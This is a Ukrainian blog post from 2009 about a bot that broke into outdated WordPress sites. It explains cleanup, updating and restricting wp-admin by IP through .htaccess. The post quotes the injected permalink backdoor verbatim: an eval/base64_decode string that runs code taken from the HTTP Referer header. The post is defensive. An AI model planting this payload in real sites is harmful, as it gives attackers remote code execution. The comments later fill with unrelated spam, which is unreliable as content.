sitemap archive

Взломали ваш блог на Вордпресі. Не знаєте що робити? Тоді читайте!

в категорії wordpress фішки

Вчора пройшла хвиля атаки і взлому блогів на вордпресі. А якщо погуглити, то можемо зробити висновок, що пострадали тисячі сайтів.

Так в чому полягала суть? А суть в тому, що дехто запустив в мережу бота, що виявляв старі версії WordPress (до версії 2.8.4) і користуючись старим багом, реєстрував юзера і використовуючи певних шаблон посилання отримував адмінські права, потім під цим юзером міняв шаблон ЧПУ в налаштуваннях, а далі модифікував (заражав) код теми, щоб підсовувати відвідувачам вірус чи ще якусь фігню.

І хоч мій блог досі працює на одній із старих версій вордпресу, але його ця напасть минувала. А все тому, що бот визначав версію блога по мета-тегу, що автоматом прописує вордпрес в усі теми, а я цей тег давним давно в себе видалив. Про те, як видалити цей тег, я писав раніше в статті: корисні функції в functions.php — раджу і вам таке зробити ;)

А тим, хто вже пострадав від цього віруса, черв’яка, бота (називайте як хочете) потрібно зробити:

  • В налаштуваннях ЧПУ, поміняти з
    /%postname%/%&({${evаl(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
    на
    /%postname%/
    (у вас може відрізнятись структура, по аналогії я думаю зрозумієте :))
  • Найдіть останнього зареєстрованого користувача на вашому сайті і знищіть його! Швидше за все, це буде MikeWink E-mail: bugbeemershonyhe@gmail.com
  • Оновити WordPress до версії 2.8.4

Але якщо немає бажання оновлюватись і хочете покращити безпеку свого блогу, ви можете заборонити всім доступ до адмінки окрім себе, за допомогою невеличкої правки .htaccess
Звичайно, було б добре коли у вас постійний статичний IP-адрес, тоді тільки б його і вказали. А якщо у вас динамічна айпішка, то можете вказати діапазон
Для цього зробіть наступне:

  • зайдіть на сайт myip.ru аби дізнатись ваш IP адрес (способів дізнатись зовнішній айпі дуже багато, я привів самий простий для блондинок). Ви наприклад побачили: ВАШ IP-АДРЕС: 91.134.98.173
  • створіть файл .htaccess в папці wp-admin вашого блогу і пропишіть там наступне:
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.98.173
    

    а якщо у вас динамічна айпішка, то краще напишіть так:

    
    AuthUserFile /dev/null
    AuthGroupFile /dev/null
    AuthName "Access Control"
    AuthType Basic
    
    order deny,allow
    deny from all
    allow from 91.134.0.0/255.255.0.0
    

    Детальніше про синтаксис директив Allow, Deny для Apache htaccess читайте тут.

  • Збережіть файл. Все.

Тепер, до адмінки вашого блогу зможете потрапити лише ви з вашого комп’ютера. А якщо ви будете в дорозі, або в інтернет-кафе і захочете, зайти в адмінку блога, а вас не буде пускати (швидше за все, ви побачите помилку 404), бо айпішка не входить у вказаний діапазон, то тоді вам потрібно буде зайти по фтп на хостинг і тимчасово переіменувати файл .htaccess. І тут мабудь хтось з вас подумав: «Це що, я ще й маю пароль на фтп пам’ятати для таких випадків?» — Ну а що ви хотіли, прийдеться жертувати зручністю заради безпеки. Це як у відомій цитаті: «Так вам шашечки или ехать?!»

Бережіть себе і бережіть свій блог.

22 коментаріrss-comments

[@] ]]>ELECTRIC]]> 7 Вересня 2009 09:10

Але якщо на сайті немає реєстрації користувачів і є лише один користувач , то ця проблема не є актуальна.

]]>lilumi]]> 7 Вересня 2009 10:22

ти знаєш, на рахунок цього, я не впевнений :) Можливо той бот реєструється в обхід звичайної системи реєстрації, користуючись якимось багом вордпресу.

 
 
[@] ]]>ELECTRIC]]> 7 Вересня 2009 22:54

щось дуже сумніавюся. перевірив на двох блогах. там по одному зареєстрованому адміну і все.

 
]]>virua]]> 8 Вересня 2009 09:48

Можу погодитися з думкою ELECTRIC’а, що в даному випадку ламають сайти, де є дозволена реєстрація користувачів. З власного досвіду: з 4-х моїх блогів на ВП інфіковано лише той, де є дозволена реєстрація.

]]>lilumi]]> 10 Вересня 2009 10:59

судячи з коментарів у Лекактуса: http://lecactus.ru/2009/09/06/4712/#comment-33308 — навіть при закритій реєстрації бот умудряється реєструватись

 
 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:33

Я обмежив доступ по ір, у мене постійна адреса.

 
]]>Юрко Червоний™]]> 16 Вересня 2009 19:38

До речі, у мене всюди заборонене реєстрація. а також немає показу номеру версії. І всі сайто-блоґи цілі.

]]>lilumi]]> 16 Вересня 2009 19:40

правильно робиш

 
 
[@] ]]>Homelab]]> 20 Вересня 2009 20:53

Практика показує, що взламати можна все. рекомендую частіше робити бекапи, бо якщо блог стане популярним, то ламатимуть його однозначно… таке життя

 
]]>Макс]]> 2 Грудня 2010 09:29

Давно використовую .htaccess для обмеження доступу в адмін частину у сайтах які будую на вордпресі, і виявляється не дарма.

 
[@] ]]>Тетяна]]> 13 Грудня 2010 10:16

А якщо вже взломали,що тодi робити???

]]>lilumi]]> 13 Грудня 2010 12:46

ну якщо сайт не робочий, то відновити з бекапу, поміняти паролі і обновити вордпресс та плагіни

 
 
]]>Cleta]]> 6 Квітня 2019 21:24

DROP WIRELESS CHARGER has passed strict safety tests.

 
]]>hipertrofia o que e]]> 31 Травня 2019 23:29

PRESIDENTE- Aparecia tendo convivência sexuais com região.

 
]]>Lucie]]> 11 Червня 2019 19:38

Hello, after reading this awesome piece of writing i
am too glad to share my experience here with colleagues.

 
]]>web site]]> 8 Липня 2019 20:12

Równiez dla ⲣlantatorów oferowane ѕa
okrążenia PCV.

 
]]>ایمپلنت]]> 18 Липня 2019 01:05

درمان‌های ارتودنسی و کاشت دهان به زیباسازی لبخند
کمک می‌کنند و گاهی لازم است از هر دو طرز
پهلو روی برخی بیماران بوسیله سرود مصالحه مشکلات
دندانی و بزمین نشستن به لبخند ملیح استفاده شود.
متخصصین ما درون کلینیک تخصصی
ارتودنسی دکتر داودیان امکان پذیر است در حین
درمان ارتودنسی از مینی اسکروها بوسیله سرود جابه‌جا کردن دندان‌ها و ایجاد فضای مناسب
بخاطر کاشت پروتز دندانی استعمال کنند، که در
این حالت خود جراحی کاشت در آخرین ماه‌های
ارتودنسی انجام می‌شود. همچنین
در تعدادی موارد بر ماخذ تشخیص، متخصص ارتودنسی ممکن است از
مینی اسکرو خواه مینی ایمپلنت برای بستن فاصله‌های کم بین دندان‌ها استفاده کند که در این حالت دیگر مریض احتیاج به ایمپلنت‌های دندانی نخواهد داشت.درمان‌های ارتودنسی و کاشت دهان به زیباسازی لبخند دستیار می‌کنندکاشت دندان بهترین روش برای جایگزینی دندان از دست رفته استفاده از
ایمپلنت دندان در ارتودنسیکاشت دندان غالباً بهترین
روش بخاطر جایگزینی دندان از دست رفته
به شمار می‌آید. ایمپلنت دندان
داخل استخوان فک به گونه‌ای قرار داده می‌شود تا
با استخوان طبیعی جوش بخورد و پایه‌ای
مقاوم و قوی را بخاطر دهان جایگزین بوسیله
مشت دهد. ایمپلنت را می‌توان جایگزین یک دهان کرد یا از آن
به عنوان محور بریج (پل) یا دهان جعلی دربرگیرنده چند دندان استفاده نمود.

 

Hi there to every one, the contents present at this website are actually awesome for people knowledge,
well, keep up the good work fellows.

 

Remarkable! Its actually remarkable paragraph, I have got much clear idea regarding from
this paragraph.

 
]]>Emily]]> 9 Серпня 2019 05:09

Have you ever considered creating an ebook or guest authoring
on other sites? I have a blog based upon on the same subjects you discuss and
would really like to have you share some stories/information. I know my subscribers
would value your work. If you are even remotely interested, feel free to shoot me an e mail.

 
]]>whales hair clippers]]> 9 Серпня 2019 14:56

Now that nearly all the galleries are gone, replaced
inexorably by one hair salon after another, Old City’s Gallery Row needs a new name.
@cccamac and I suggest:

—Cuttery Row
—Clippe>’s Row
—Dandruff Row
—Sassoon Ro>

 
]]>Rank my site]]> 23 Серпня 2019 22:13

It’s a shame you don’t have a donate button! I’d without a doubt donate to
this excellent blog! I suppose for now i’ll settle for bookmarking and adding your RSS feed to my Google account.
I look forward to brand new updates and will share this site
with my Facebook group. Chat soon!

 

Ваш коментар

LilumiМене звати LiluMi, а це мій блоґ. Тут про веб-розробку та лайфхаки. Рекомендую підписатись на RSS Інформацію про мене читайте на сторінці me LiluMi
UA TOP Bloggers

Тобі передають привіт 72 медвежаток. Це підняло тобі настрій на 0,465 а в Австралії живе колібрі у якої дзьобик довжиною на 42.58см.